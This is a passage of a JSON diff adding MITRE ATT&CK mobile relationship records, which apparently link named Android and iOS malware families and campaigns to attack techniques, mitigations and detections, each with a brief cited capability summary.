"x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6935752c-e400-4dfa-863f-1d44a8f6dd50", + "type": "relationship", + "created": "2021-09-20T13:50:02.036Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + } + ], + "modified": "2021-09-20T13:50:02.036Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can make phone calls.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--41da5845-a1a8-4d10-8929-053be3496396", + "created": "2022-04-20T17:46:43.542Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/" + }, + { + "source_name": "Bitdefender - Triout 2018", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout – Spyware Framework for Android with Extensive Surveillance Capabilities. Retrieved January 21, 2020.", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:39:57.165Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) uses HTTP data exfiltration.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--81fb62ac-ba04-48d2-8817-52d0652f61a0", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CheckPoint-Judy", + "description": "CheckPoint. (2017, May 25). The Judy Malware: Possibly the largest malware campaign found on Google Play. Retrieved September 18, 2018.", + "url": "https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[Judy](https://attack.mitre.org/software/S0325) bypasses Google Play's protections by downloading a malicious payload at runtime after installation.(Citation: CheckPoint-Judy)", + "relationship_type": "uses", + "source_ref": "malware--172444ab-97fc-4d94-b142-179452bfb760", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8c8ce536-d9b5-4dfc-93f1-84c4f222b49e", + "type": "relationship", + "created": "2021-01-05T20:16:20.512Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-01-05T20:16:20.512Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can check the device’s battery status.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5151b976-cfcf-4771-a75a-995d49bcc1ab", + "created": "2022-04-11T20:06:38.811Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile security products that are part of the Samsung Knox for Mobile Threat Defense program could examine running applications while the device is idle, potentially detecting malicious applications that are running primarily when the device is not being used.", + "modified": "2022-04-11T20:06:38.811Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "target_ref": "attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bc79a212-139f-4dce-be72-e90585f38f03", + "created": "2023-03-16T18:31:37.091Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:31:37.091Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a290a8ca-e650-456c-b33e-03343fe5ea4e", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) accesses sensitive data in files, such as saving Skype calls by reading them out of the Skype database files.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8fd05d96-552d-4ef9-98e3-ea70dc84f6a9", + "created": "2022-03-30T14:26:02.359Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android Changes to System Broadcasts", + "url": "https://developer.android.com/guide/components/broadcasts#changes-system-broadcasts", + "description": "Google. (2019, December 27). Broadcasts Overview. Retrieved January 27, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 8 introduced additional limitations on the implicit intents that an application can register for.(Citation: Android Changes to System Broadcasts) ", + "modified": "2022-03-30T14:26:02.359Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--d446b9f0-06a9-4a8d-97ee-298cfee84f14", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a285f343-09c3-49af-9c18-1dccf89e9009", + "type": "relationship", + "created": "2020-11-20T16:37:28.391Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-11-20T16:37:28.391Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can collect a directory listing of external storage.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4b8d027d-5da2-4a01-ad31-b6644a5cda61", + "type": "relationship", + "created": "2020-04-24T15:06:33.495Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T15:06:33.495Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can track the device’s location.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b5f3b110-fc66-4369-89f3-621c945d655f", + "type": "relationship", + "created": "2020-04-27T16:52:49.444Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Triada June 2019", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019." + } + ], + "modified": "2020-04-27T16:52:49.444Z", + "description": "[Triada](https://attack.mitre.org/software/S0424) encrypts data prior to exfiltration.(Citation: Google Triada June 2019) ", + "relationship_type": "uses", + "source_ref": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "target_ref": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7d6bba99-ea81-42bc-b02a-e5e98b34a688", + "created": "2020-05-07T15:33:32.910Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CheckPoint Agent Smith", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020.", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:19:44.427Z", + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) can hide its icon from the application launcher.(Citation: CheckPoint Agent Smith)", + "relationship_type": "uses", + "source_ref": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8f2ff9c5-249d-4a9a-bdc6-0cef887eaefc", + "type": "relationship", + "created": "2020-07-15T20:20:59.298Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-07-15T20:20:59.298Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) obfuscates its hardcoded C2 URLs.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--75400f2e-8a9a-4bc6-a40b-f860b38868b6", + "created": "2023-03-16T13:31:29.822Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T13:31:29.822Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ab67b233-2c3d-4ac2-a3f0-13b6484ea920", + "created": "2022-04-05T19:46:22.326Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be wary of granting applications dangerous or privacy-intrusive permissions, such as keyboard registration or accessibility service access.", + "modified": "2022-04-05T19:46:22.326Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6f63395f-a826-45e2-8d3b-dccd6375f54d", + "created": "2019-07-10T15:25:57.585Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:39:29.860Z", + "description": "[FinFisher](https://attack.mitre.org/software/S0182) accesses and exfiltrates the call log.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--a5528622-3a8a-4633-86ce-8cdaf8423858", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--96ec33c8-78b6-421f-bab3-bd9d0564db31", + "created": "2022-09-29T20:11:55.474Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T18:39:16.003Z", + "description": "During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used Android backdoors capable of enumerating specific files on the infected devices.(Citation: Cylance Dust Storm)", + "relationship_type": "uses", + "source_ref": "campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--300c824d-5586-411b-b274-8941a99a98fb", + "created": "2022-03-30T14:06:01.859Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Device attestation can often detect jailbroken or rooted devices.", + "modified": "2022-03-30T14:06:01.859Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--09c6bbd4-9058-4657-9d8e-656439637ac6", + "created": "2023-03-16T18:32:47.895Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:32:47.895Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--35c67a18-7e8d-4bd5-9fe1-35b1ac3f401f", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Wandera-RedDrop", + "url": "https://www.wandera.com/reddrop-malware/", + "description": "Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[RedDrop](https://attack.mitre.org/software/S0326) tricks the user into sending SMS messages to premium services and then deletes those messages.(Citation: Wandera-RedDrop)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c89d6493-3f33-4568-ac77-ba13b206ae69", + "created": "2023-03-20T18:52:24.667Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:52:24.667Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--492d5699-f885-411a-8431-254fcf33fb12", + "created": "2019-08-09T16:14:58.367Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Android Capture Sensor 2019", + "url": "https://developer.android.com/about/versions/pie/android-9.0-changes-all#bg-sensor-access", + "description": "Android Developers. (, January). Android 9+ Privacy Changes . Retrieved August 27, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 9 and above restricts access to the mic, camera, and other device sensors from applications running in the background. iOS 14 and Android 12 introduced a visual indicator on the status bar (green dot) when an application is accessing the device’s camera.(Citation: Android Capture Sensor 2019)", + "modified": "2022-04-01T13:56:12.774Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7b611c76-0ea1-49c5-9b9a-2e504a0bbe14", + "created": "2020-06-26T15:32:25.043Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020.", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:53:04.417Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) disables Google Play Protect to prevent its discovery and deletion in the future.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b24553a7-01c7-49b2-b1e0-fb961e788de2", + "type": "relationship", + "created": "2020-06-26T15:32:25.062Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T15:32:25.062Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can obtain a list of installed applications.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--be256f8a-8bae-4a00-8682-22797ba7e0ce", + "type": "relationship", + "created": "2019-09-04T14:28:15.975Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-10-14T17:51:38.054Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) queries the device for metadata such as make, model, and power levels.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f6f21954-c592-40d8-b7a0-75f332c42eaa", + "created": "2020-11-10T17:08:35.761Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:00:38.611Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) has deleted call log entries coming from known C2 sources.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--44b63426-1ea7-456e-907b-0856e3eab0c3", + "type": "relationship", + "created": "2020-12-31T18:25:05.142Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." + } + ], + "modified": "2020-12-31T18:25:05.142Z", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) has collected the device’s location.(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--1f8b1ee1-e44b-4a37-a407-5cbceba35d87", + "type": "relationship", + "created": "2020-05-04T14:04:56.217Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Bread", + "url": 